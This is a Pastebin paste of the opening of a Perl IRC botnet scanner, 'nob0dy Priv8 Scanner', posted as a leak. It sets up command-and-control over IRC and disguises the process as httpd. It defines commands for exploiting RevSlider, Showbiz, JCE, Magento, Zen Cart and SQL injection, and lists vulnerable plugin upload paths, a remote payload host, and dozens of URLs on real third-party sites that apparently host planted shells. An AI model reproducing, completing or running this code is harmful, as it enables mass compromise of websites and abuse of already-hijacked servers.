1x33x7

nob0dy Priv8 Scanner SE (500+ Proxy Version) leak by 1x33x7

Nov 2nd, 2016
9,701
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 343.67 KB | None | 0 0
  1. #!/usr/bin/perl
  2.  
  3.  
  4.  
  5. use HTTP::Request;
  6.  
  7. use HTTP::Request::Common;
  8.  
  9. use HTTP::Request::Common qw(POST);
  10.  
  11. use LWP::Simple;
  12.  
  13. use LWP 5.64;
  14.  
  15. use LWP::UserAgent;
  16.  
  17. use IO::Socket;
  18.  
  19. use IO::Socket::INET;
  20.  
  21. use IO::Select;
  22.  
  23. use Socket;
  24.  
  25. use MIME::Base64;
  26.  
  27. use File::Basename;
  28.  
  29. use URI::Escape;
  30.  
  31. use Digest::MD5 qw(md5_hex);
  32.  
  33. #use DBI;
  34.  
  35.  
  36.  
  37. my $datetime    = localtime;
  38.  
  39. my $fakeproc    = "/usr/sbin/httpd";
  40.  
  41. my $ircserver   = "xxxYOUR-IPxxx";
  42.  
  43. my $ircport     = "9595";
  44.  
  45. my $number      = int(rand(10));
  46.  
  47. my $nickname    = "Norbert[".$number."]";
  48.  
  49. my $ident       = "bot".$number;
  50.  
  51. my $chan        = "#scanz";
  52.  
  53. my $chanx       = "#scanz";
  54.  
  55. my $admin       = "1x33x7";
  56.  
  57. my $base        = "sHoOcK";
  58.  
  59. my $fullname    = "9[ 15aanK4FM9 ]";
  60.  
  61. my $nob0dy      = "9[ 15aanK4FM9 ]";
  62.  
  63. my $logo        = "9[ 15aanK4FM9 ]";
  64.  
  65. my $DBlogo      = "9[ 15DB4HacK9 ]";
  66.  
  67.  
  68.  
  69. my $ftplogo     = "9[ 15FTP4Hack9 ]";
  70.  
  71. my $bplogo      = "9[ 15By4Pass9 ]";
  72.  
  73. my $cfxlogo     = "9[ 15Con4tact9 ]";
  74.  
  75. my $hdflogo     = "9[ 15HD4Flvplayer9 ]";
  76.  
  77. my $adslogo     = "9[ 15Ads4Manager9 ]";
  78.  
  79. my $maglogo     = "9[ 15Mag4Entot9 ]";
  80.  
  81. my $magslogo    = "9[ 15Mag4eXPo9 ]";
  82.  
  83. my $jcelogo     = "9[ 15JC4E9 ]";
  84.  
  85. my $cckjlogo    = "9[ 15CC4KJ9 ]";
  86.  
  87. my $sqllogo     = "9[ 15SQ4L9 ]";
  88.  
  89.  
  90.  
  91. my $searchlogo  = "9[ 15Surf4ing9 ]";
  92.  
  93. my $rsqllogo    = "9[ 15DB4Rev9 ]";
  94.  
  95. my $revlogo     = "9[ 15Rev4Slider9 ]";
  96.  
  97. my $jdllogo     = "9[ 15Com4Jdownloads9 ]";
  98.  
  99. my $zenlogo     = "9[ 15Zen4Cart9 ]";
  100.  
  101. my $esqllogo    = "9[ 15eS4qL9 ]";
  102.  
  103.  
  104.  
  105. my $revcmd      = "!rev".$number;
  106.  
  107. my $cfxcmd      = "!cfx".$number;
  108.  
  109. my $hdfcmd      = "!hdf".$number;
  110.  
  111. my $zencmd      = "!zen".$number;
  112.  
  113. my $jdlcmd      = "!don".$number;
  114.  
  115. my $adscmd      = "!ads".$number;
  116.  
  117. my $magcmd      = "!mag".$number;
  118.  
  119. my $jcecmd      = "!jce".$number;
  120.  
  121. my $magscmd     = "!mags".$number;
  122.  
  123. my $cckjcmd     = "!cckj".$number;
  124.  
  125. my $sqlcmd      = "!sql".$number;
  126.  
  127. my $esqlcmd     = "!sqle".$number;
  128.  
  129.  
  130.  
  131. #my $chkcmd     = "!chk".$number;
  132.  
  133.  
  134.  
  135. my $plugin      = "revslider";
  136.  
  137. my $action      = "revslider_ajax_action";
  138.  
  139. my $update_file = "revslider.zip";
  140.  
  141.  
  142.  
  143. my $zenfile     = "myluph.PHP";
  144.  
  145. my $pubscan     = 1;
  146.  
  147. my $spread      = 1;
  148.  
  149. my $blackunix   = "http://www.fickbus.de/wp-content/data/"; #http://www.1plus1.am/lib/
  150.  
  151. my $bulusukan   = "http://www.fickbus.de/wp-content/data/";
  152.  
  153. my $badsite     = "sectools.org|100torrent.com|logs|access_log|google|yahoo|securityaffairs|youtube.com|packetstormsecurity|github|awstats|stackoverflow|archive-cu.com|joomlaforum.ru|stackoverflow.com|archive-ca.com";
  154.  
  155.  
  156.  
  157. my @unix            = ("/framework/plugins/revslider/temp/update_extract/","/lib/revslider/temp/update_extract/","/script/revslider/temp/update_extract/","/framework/modules/revslider/temp/update_extract/","/revslider/temp/update_extract/","/classes/revslider/temp/update_extract/","/plugins/revslider/temp/update_extract/","/advance/plugins/revslider/temp/update_extract/","/wonderfoundry/addons/plugins/revslider/temp/update_extract/","/revslider/temp/update_extract/","/js/revslider/temp/update_extract/","/minimax/modules/revslider/temp/update_extract/","/library/revslider/temp/update_extract/","/sections/revslider/temp/update_extract/","/framework/tmp/revslider/temp/update_extract/","/Lioit/revslider/temp/update_extract/","/theme/templates/sliders/revslider/temp/update_extract/");
  158.  
  159. my @umix            = ("/framework/plugins/showbiz/temp/update_extract/","/lib/showbiz/temp/update_extract/","/script/showbiz/temp/update_extract/","/framework/modules/showbiz/temp/update_extract/","/showbiz/temp/update_extract/","/classes/showbiz/temp/update_extract/","/plugins/showbiz/temp/update_extract/","/advance/plugins/showbiz/temp/update_extract/","/wonderfoundry/addons/plugins/showbiz/temp/update_extract/","/showbiz/temp/update_extract/","/js/showbiz/temp/update_extract/","/minimax/modules/showbiz/temp/update_extract/","/library/showbiz/temp/update_extract/","/sections/showbiz/temp/update_extract/","/framework/tmp/showbiz/temp/update_extract/","/Lioit/showbiz/temp/update_extract/","/theme/templates/sliders/showbiz/temp/update_extract/");
  160.  
  161. my @kaca            = ("themes/aries/revslider/temp/update_extract/","themes/beach_apollo/advance/plugins/revslider/temp/update_extract/","themes/incrediblewp/revslider/temp/update_extract/","themes/cuckoobizz/framework/plugins/revslider/temp/update_extract/","themes/paragon/framework/plugins/revslider/temp/update_extract/","themes/striking_r/framework/plugins/revslider/temp/update_extract/","themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/","themes/schema-corporate/classes/revslider/temp/update_extract/","plugins/revslider/temp/update_extract/","themes/medicate/script/revslider/temp/update_extract/","themes/celestino/theme/templates/sliders/revolution-slider/temp/update_extract/","themes/libra/theme/templates/sliders/revolution-slider/temp/update_extract/"."themes/radio/revslider/temp/update_extract/","plugins/revolution-slider/temp/update_extract/","themes/RoyalOak/framework/plugins/revslider/temp/update_extract/","themes/RoyalOak/framework/plugins/revolutin-slider/temp/update_extract/","themes/Avada/framework/plugins/revslider/temp/update_extract/","themes/Avada/framework/plugins/revolution-slider/temp/update_extract/","themes/centum/revslider/temp/update_extract/","themes/centum/revolution-slider/temp/update_extract/","themes/coffeeandcream/includes/revslider/temp/update_extract/","themes/coffeeandcream/includes/revolution-slider/temp/update_extract/","themes/Arham/framework/plugins/revslider/temp/update_extract/","themes/Arham/framework/plugins/revolution-slider/temp/update_extract/");
  162.  
  163. my @kontakz         = ("/cfg-contactform-1/","/cfg-contactform-2/","/cfg-contactform-3/","/cfg-contactform-4/","/cfg-contactform-5/","/cfg-contactform-6/","/cfg-contactform-7/","/cfg-contactform-8/","/cfg-contactform-9/","/cfg-contactform-10/","/cfg-contactform-11/","/cfg-contactform-12/","/cfg-contactform-13/","/cfg-contactform-14/","/cfg-contactform-15/","/cfg-contactform-16/","/cfg-contactform-17/","/cfg-contactform-18/","/cfg-contactform-19/","/cfg-contactform-20/");
  164.  
  165. my @useragents      = ("Microsoft Internet Explorer/4.0b1 (Windows 95)","Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)","Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)","Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)","Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)","Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)","Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)","Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)","Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)","Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)","Mozilla/4.0 (compatible; MSIE 7.0b; Win32)","Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)","Microsoft Pocket Internet Explorer/0.6","Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)","MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;","Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)","Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)","Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)","Advanced Browser (http://www.avantbrowser.com)","Avant Browser (http://www.avantbrowser.com)","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)","Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)","Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)","Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007","Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511","Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929","Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0","Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox","Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4","Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6","Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7","Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4","Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4","Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1","Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1","Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1","Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1","Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2","Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b","Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0","Mozilla/3.0 (OS/2; U)","Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)","Mozilla/4.61 (Macintosh; I; PPC)","Mozilla/4.61 [en] (OS/2; U)","Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)","Mozilla/4.8 [en] (Windows NT 5.0; U)");
  166.  
  167. my @doms            = ("com","ca","org","biz","tv","net","co.uk","com.ar","com.au","com.ae","com.ca","com.mx","co.kr","co.id","fr","de","it","ru");
  168.  
  169.  
  170.  
  171. my $useragent       = $useragents[rand(scalar(@useragents))];
  172.  
  173. my $uagent          = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6";
  174.  
  175. my $dom             = $doms[rand(scalar(@doms))];
  176.  
  177.  
  178.  
  179. my @pgfa            = ( "?____pgfa=https%3A%2F%2Fwww.google.com%2Fsearch?q=","?____pgfa=https%3A%2F%2Fwww.google.de%2Fsearch?q=","?____pgfa=https%3A%2F%2Fwww.google.co.uk%2Fsearch?q=","?____pgfa=https%3A%2F%2Fwww.google.com.my%2Fsearch?q=","?____pgfa=https%3A%2F%2Fwww.google.com.sg%2Fsearch?q=","?____pgfa=https%3A%2F%2Fwww.google.ru%2Fsearch?q=","?____pgfa=https%3A%2F%2Fwww.google.ro%2Fsearch?q=","?____pgfa=https%3A%2F%2Fwww.google.de%2Fsearch?q=","?____pgfa=https%3A%2F%2Fwww.google.ca%2Fsearch?q=","?____pgfa=https%3A%2F%2Fwww.google.fr%2Fsearch?q=","?____pgfa=https%3A%2F%2Fwww.google.co.id%2Fsearch?q=","?____pgfa=https%3A%2F%2Fwww.google.ru%2Fsearch?q=","?____pgfa=https%3A%2F%2Fwww.google.fr%2Fsearch?q=","?____pgfa=https%3A%2F%2Fwww.google.de%2Fsearch?q=","?____pgfa=https%3A%2F%2Fwww.google.com%2Fsearch?q=","?____pgfa=https%3A%2F%2Fwww.google.com.my%2Fsearch?q=","?____pgfa=https%3A%2F%2Fwww.google.com.br%2Fsearch?q=","?____pgfa=https%3A%2F%2Fwww.google.com.br%2Fsearch?q=","?____pgfa=https%3A%2F%2Fwww.google.co.uk%2Fsearch?q=","?____pgfa=https%3A%2F%2Fwww.google.ne%2Fsearch?q=","?____pgfa=https%3A%2F%2Fwww.google.co.mz%2Fsearch?q=","?____pgfa=https%3A%2F%2Fwww.google.com.sg%2Fsearch?q=","?____pgfa=https%3A%2F%2Fwww.google.com.mx%2Fsearch?q=","?____pgfa=https%3A%2F%2Fwww.google.com.mx%2Fsearch?q=","?____pgfa=https%3A%2F%2Fwww.google.de%2Fsearch?q=","?____pgfa=https%3A%2F%2Fwww.google.ru%2Fsearch?q=","?____pgfa=https%3A%2F%2Fwww.google.ro%2Fsearch?q=","?____pgfa=https%3A%2F%2Fwww.google.co.id%2Fsearch?q=","?____pgfa=https%3A%2F%2Fwww.google.at%2Fsearch?q=","?____pgfa=https%3A%2F%2Fwww.google.nl%2Fsearch?q=");
  180.  
  181.  
  182.  
  183. ##########################################################################################
  184.  
  185.  
  186.  
  187. my $pgfa            = $pgfa[rand(scalar(@pgfa))];
  188.  
  189.  
  190.  
  191. ##################################### By Passer ###########################################
  192.  
  193.  
  194.  
  195. my @randombarner  = ("http://www.jaguarcarclubofwa.com.au/jaguarcarclubofwa/images/error.php",
  196.  
  197.                      "http://isanew.grupomathile.com.br/errors.php",
  198.  
  199.                      "http://www.infobeton.fr/administrator/components/com_weblinks/views/errors.php",
  200.  
  201.                      "http://www.photodesign.uncanny.cz/images/error.php",
  202.  
  203. "http://www.iscavets.be/administrator/components/com_weblinks/views/errors.php",
  204.  
  205.                      "http://www.vacanzeincampagna.it/components/com_weblinks/views/errors.php",
  206.  
  207.                      "http://titiprindu.com/errors.php",
  208.  
  209.                      "http://baldwin-fitness.com/images/error.php",
  210.  
  211.                      "http://www.solucionesparati.net/CMS2008/images/error.php.1",
  212.  
  213.                      "http://totalfish.hu/errors.php/errors.php",
  214.  
  215.                      "http://www.lafutbolera.net/images/error.php",
  216.  
  217.                      "http://www.ohuihanquoc.vn/components/com_banners/models/error.php",
  218.  
  219.                      "http://www.alvestaguesthouse.co.za/wp-content/themes/welcome_inn/cache/pro.php",
  220.  
  221.                      "http://www.modelismonaval.com/components/com_user/class-mail.php",
  222.  
  223.                      "http://www.iscavets.be/administrator/components/com_weblinks/views/errors.php",
  224.  
  225.                      "http://www.infobeton.fr/administrator/components/com_weblinks/views/errors.php",
  226.  
  227.                      "http://www.picturethismenu.com/errors.php",
  228.  
  229.                      "http://www.solucionesparati.net/CMS2008/images/error.php.1",
  230.  
  231.                      "http://wavevent.fr/administrator/components/com_weblinks/views/errors.php",
  232.  
  233.                      "http://www.jaguarcarclubofwa.com.au/jaguarcarclubofwa/images/error.php",
  234.  
  235.                      "http://www.rapidsweddings.com/errors.php",
  236.  
  237.                      "http://www.modelismonaval.com/components/com_user/class-mail.php",
  238.  
  239.                      "http://www.picturethismenu.com/errors.php",
  240.  
  241.                      "http://www.alvestaguesthouse.co.za/wp-content/themes/welcome_inn/cache/pro.php",
  242.  
  243.                      "http://www.flowdynamicsinc.com/errors.php",
  244.  
  245.                      "http://wavevent.fr/administrator/components/com_weblinks/views/errors.php",
  246.  
  247.                      "http://allindustrialcorp.com/errors.php",
  248.  
  249.                      "http://priorityelectricutility.com/errors.php",
  250.  
  251.                      "http://all-cylinders.com/errors.php",
  252.  
  253.                      "http://snscylinders.com/errors.php"
  254.  
  255.                      );
  256.  
  257.  
  258.  
  259. my @randombarner1  = ("http://www.flowdynamicsinc.com/errors.php","http://www.aramea.co/components/com_mailto/error.php","http://www.vacanzeincampagna.it/components/com_weblinks/views/errors.php","http://imotionasia.com.vn/errors.php","","http://www.astcl.com/astcl/components/com_mailto/error.php","http://www.vacanzeincampagna.it/components/com_weblinks/views/errors.php","http://turismo.uladech.edu.pe/components/com_mailto/error.php","http://www.alvestaguesthouse.co.za/wp-content/themes/welcome_inn/cache/pro.php","http://w2.portais.atrio.scire.net.br/upe-ppte/components/com_mailto/error.php","http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php","http://www.dzo.ufla.br/pet/components/com_mailto/error.php","http://www.anz.udo.edu.ve/components/com_mailto/error.php","http://www.infobeton.fr/administrator/components/com_weblinks/views/errors.php","http://www.photodesign.uncanny.cz/images/error.php","http://titiprindu.com/errors.php","http://www.solucionesparati.net/CMS2008/images/error.php.1","http://wavevent.fr/administrator/components/com_weblinks/views/errors.php","http://www.rapidsweddings.com/errors.php","http://www.ski-freizeit-reisen.de/components/com_mailto/error.php","http://p.istu.ru//components/com_mailto/error.php","http://www.telsonet.pl/errors.php","http://www.modelismonaval.com/components/com_user/class-mail.php","http://optim.gim.med.up.pt/components/com_mailto/error.php","http://www.picturethismenu.com/errors.php","http://www.seccons.de/components/com_mailto/error.php","http://www.iestpjasdc.edu.pe/contabilidad/components/com_mailto/error.php","http://pollenz.net/components/com_banners/error.php","http://www.rpdoarmmgov.ph/redpb/components/com_mailto/error.php","http://www.fcors.com.br/modules/mod_banners/error.php","http://www.bortolotto.eu/plugins/editors/error.php","http://www.flowdynamicsinc.com/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://pictoborden.nl/site/media/mailto/error.php","http://www.bendit.co/backside/media/mailto/error.php","http://www.gambinigroup.it/media/mailto/error.php","http://rothwellscouts.com/media/mailto/error.php","http://www.alvestaguesthouse.co.za/wp-content/themes/welcome_inn/cache/pro.php","http://www.infobeton.fr/administrator/components/com_weblinks/views/errors.php","http://www.rpdoarmmgov.ph/redpb/components/com_mailto/error.php","http://www.pebk.de/joomla/components/com_mailto/error.php","http://upgrade.3t.aprs.la/components/com_mailto/error.php","http://www.theatresprives.com/errors.php","http://www.allcam.org/errors.php","http://www.pastorbonus.sk/errors.php","http://circuitec.com.br/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://www.thewigmall.com/errors.php","http://blahaoffroadteam.hu/errors.php","http://www.geld-verdienen-online.org/errors.php","http://www.cannell-immobilier.com/errors.php","http://www.allcam.org/errors.php","http://blahaoffroadteam.hu/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://totalfish.hu/errors.php/errors.php","http://www.iestpjasdc.edu.pe/contabilidad/components/com_mailto/error.php","http://www.flowdynamicsinc.com/errors.php","http://www.gambinigroup.it/media/mailto/error.php","http://www.pastorbonus.sk/errors.php");
  260.  
  261. my @randombarner2  = ("http://www.flowdynamicsinc.com/errors.php","http://www.aramea.co/components/com_mailto/error.php","http://www.vacanzeincampagna.it/components/com_weblinks/views/errors.php","http://imotionasia.com.vn/errors.php","","http://www.astcl.com/astcl/components/com_mailto/error.php","http://www.vacanzeincampagna.it/components/com_weblinks/views/errors.php","http://turismo.uladech.edu.pe/components/com_mailto/error.php","http://www.alvestaguesthouse.co.za/wp-content/themes/welcome_inn/cache/pro.php","http://w2.portais.atrio.scire.net.br/upe-ppte/components/com_mailto/error.php","http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php","http://www.dzo.ufla.br/pet/components/com_mailto/error.php","http://www.anz.udo.edu.ve/components/com_mailto/error.php","http://www.infobeton.fr/administrator/components/com_weblinks/views/errors.php","http://www.photodesign.uncanny.cz/images/error.php","http://titiprindu.com/errors.php","http://www.solucionesparati.net/CMS2008/images/error.php.1","http://wavevent.fr/administrator/components/com_weblinks/views/errors.php","http://www.rapidsweddings.com/errors.php","http://www.ski-freizeit-reisen.de/components/com_mailto/error.php","http://p.istu.ru//components/com_mailto/error.php","http://www.telsonet.pl/errors.php","http://www.modelismonaval.com/components/com_user/class-mail.php","http://optim.gim.med.up.pt/components/com_mailto/error.php","http://www.picturethismenu.com/errors.php","http://www.seccons.de/components/com_mailto/error.php","http://www.iestpjasdc.edu.pe/contabilidad/components/com_mailto/error.php","http://pollenz.net/components/com_banners/error.php","http://www.rpdoarmmgov.ph/redpb/components/com_mailto/error.php","http://www.fcors.com.br/modules/mod_banners/error.php","http://www.bortolotto.eu/plugins/editors/error.php","http://www.flowdynamicsinc.com/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://pictoborden.nl/site/media/mailto/error.php","http://www.bendit.co/backside/media/mailto/error.php","http://www.gambinigroup.it/media/mailto/error.php","http://rothwellscouts.com/media/mailto/error.php","http://www.alvestaguesthouse.co.za/wp-content/themes/welcome_inn/cache/pro.php","http://www.infobeton.fr/administrator/components/com_weblinks/views/errors.php","http://www.rpdoarmmgov.ph/redpb/components/com_mailto/error.php","http://www.pebk.de/joomla/components/com_mailto/error.php","http://upgrade.3t.aprs.la/components/com_mailto/error.php","http://www.theatresprives.com/errors.php","http://www.allcam.org/errors.php","http://www.pastorbonus.sk/errors.php","http://circuitec.com.br/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://www.thewigmall.com/errors.php","http://blahaoffroadteam.hu/errors.php","http://www.geld-verdienen-online.org/errors.php","http://www.cannell-immobilier.com/errors.php","http://www.allcam.org/errors.php","http://blahaoffroadteam.hu/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://totalfish.hu/errors.php/errors.php","http://www.iestpjasdc.edu.pe/contabilidad/components/com_mailto/error.php","http://www.flowdynamicsinc.com/errors.php","http://www.gambinigroup.it/media/mailto/error.php","http://www.pastorbonus.sk/errors.php");
  262.  
  263. my @randombarner3  = ("http://www.flowdynamicsinc.com/errors.php","http://www.aramea.co/components/com_mailto/error.php","http://www.vacanzeincampagna.it/components/com_weblinks/views/errors.php","http://imotionasia.com.vn/errors.php","","http://www.astcl.com/astcl/components/com_mailto/error.php","http://www.vacanzeincampagna.it/components/com_weblinks/views/errors.php","http://turismo.uladech.edu.pe/components/com_mailto/error.php","http://www.alvestaguesthouse.co.za/wp-content/themes/welcome_inn/cache/pro.php","http://w2.portais.atrio.scire.net.br/upe-ppte/components/com_mailto/error.php","http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php","http://www.dzo.ufla.br/pet/components/com_mailto/error.php","http://www.anz.udo.edu.ve/components/com_mailto/error.php","http://www.infobeton.fr/administrator/components/com_weblinks/views/errors.php","http://www.photodesign.uncanny.cz/images/error.php","http://titiprindu.com/errors.php","http://www.solucionesparati.net/CMS2008/images/error.php.1","http://wavevent.fr/administrator/components/com_weblinks/views/errors.php","http://www.rapidsweddings.com/errors.php","http://www.ski-freizeit-reisen.de/components/com_mailto/error.php","http://p.istu.ru//components/com_mailto/error.php","http://www.telsonet.pl/errors.php","http://www.modelismonaval.com/components/com_user/class-mail.php","http://optim.gim.med.up.pt/components/com_mailto/error.php","http://www.picturethismenu.com/errors.php","http://www.seccons.de/components/com_mailto/error.php","http://www.iestpjasdc.edu.pe/contabilidad/components/com_mailto/error.php","http://pollenz.net/components/com_banners/error.php","http://www.rpdoarmmgov.ph/redpb/components/com_mailto/error.php","http://www.fcors.com.br/modules/mod_banners/error.php","http://www.bortolotto.eu/plugins/editors/error.php","http://www.flowdynamicsinc.com/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://pictoborden.nl/site/media/mailto/error.php","http://www.bendit.co/backside/media/mailto/error.php","http://www.gambinigroup.it/media/mailto/error.php","http://rothwellscouts.com/media/mailto/error.php","http://www.alvestaguesthouse.co.za/wp-content/themes/welcome_inn/cache/pro.php","http://www.infobeton.fr/administrator/components/com_weblinks/views/errors.php","http://www.rpdoarmmgov.ph/redpb/components/com_mailto/error.php","http://www.pebk.de/joomla/components/com_mailto/error.php","http://upgrade.3t.aprs.la/components/com_mailto/error.php","http://www.theatresprives.com/errors.php","http://www.allcam.org/errors.php","http://www.pastorbonus.sk/errors.php","http://circuitec.com.br/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://www.thewigmall.com/errors.php","http://blahaoffroadteam.hu/errors.php","http://www.geld-verdienen-online.org/errors.php","http://www.cannell-immobilier.com/errors.php","http://www.allcam.org/errors.php","http://blahaoffroadteam.hu/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://totalfish.hu/errors.php/errors.php","http://www.iestpjasdc.edu.pe/contabilidad/components/com_mailto/error.php","http://www.flowdynamicsinc.com/errors.php","http://www.gambinigroup.it/media/mailto/error.php","http://www.pastorbonus.sk/errors.php");
  264.  
  265. my @randombarner5  = ("http://www.flowdynamicsinc.com/errors.php","http://www.aramea.co/components/com_mailto/error.php","http://www.vacanzeincampagna.it/components/com_weblinks/views/errors.php","http://imotionasia.com.vn/errors.php","","http://www.astcl.com/astcl/components/com_mailto/error.php","http://www.vacanzeincampagna.it/components/com_weblinks/views/errors.php","http://turismo.uladech.edu.pe/components/com_mailto/error.php","http://www.alvestaguesthouse.co.za/wp-content/themes/welcome_inn/cache/pro.php","http://w2.portais.atrio.scire.net.br/upe-ppte/components/com_mailto/error.php","http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php","http://www.dzo.ufla.br/pet/components/com_mailto/error.php","http://www.anz.udo.edu.ve/components/com_mailto/error.php","http://www.infobeton.fr/administrator/components/com_weblinks/views/errors.php","http://www.photodesign.uncanny.cz/images/error.php","http://titiprindu.com/errors.php","http://www.solucionesparati.net/CMS2008/images/error.php.1","http://wavevent.fr/administrator/components/com_weblinks/views/errors.php","http://www.rapidsweddings.com/errors.php","http://www.ski-freizeit-reisen.de/components/com_mailto/error.php","http://p.istu.ru//components/com_mailto/error.php","http://www.telsonet.pl/errors.php","http://www.modelismonaval.com/components/com_user/class-mail.php","http://optim.gim.med.up.pt/components/com_mailto/error.php","http://www.picturethismenu.com/errors.php","http://www.seccons.de/components/com_mailto/error.php","http://www.iestpjasdc.edu.pe/contabilidad/components/com_mailto/error.php","http://pollenz.net/components/com_banners/error.php","http://www.rpdoarmmgov.ph/redpb/components/com_mailto/error.php","http://www.fcors.com.br/modules/mod_banners/error.php","http://www.bortolotto.eu/plugins/editors/error.php","http://www.flowdynamicsinc.com/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://pictoborden.nl/site/media/mailto/error.php","http://www.bendit.co/backside/media/mailto/error.php","http://www.gambinigroup.it/media/mailto/error.php","http://rothwellscouts.com/media/mailto/error.php","http://www.alvestaguesthouse.co.za/wp-content/themes/welcome_inn/cache/pro.php","http://www.infobeton.fr/administrator/components/com_weblinks/views/errors.php","http://www.rpdoarmmgov.ph/redpb/components/com_mailto/error.php","http://www.pebk.de/joomla/components/com_mailto/error.php","http://upgrade.3t.aprs.la/components/com_mailto/error.php","http://www.theatresprives.com/errors.php","http://www.allcam.org/errors.php","http://www.pastorbonus.sk/errors.php","http://circuitec.com.br/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://www.thewigmall.com/errors.php","http://blahaoffroadteam.hu/errors.php","http://www.geld-verdienen-online.org/errors.php","http://www.cannell-immobilier.com/errors.php","http://www.allcam.org/errors.php","http://blahaoffroadteam.hu/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://totalfish.hu/errors.php/errors.php","http://www.iestpjasdc.edu.pe/contabilidad/components/com_mailto/error.php","http://www.flowdynamicsinc.com/errors.php","http://www.gambinigroup.it/media/mailto/error.php","http://www.pastorbonus.sk/errors.php");
  266.  
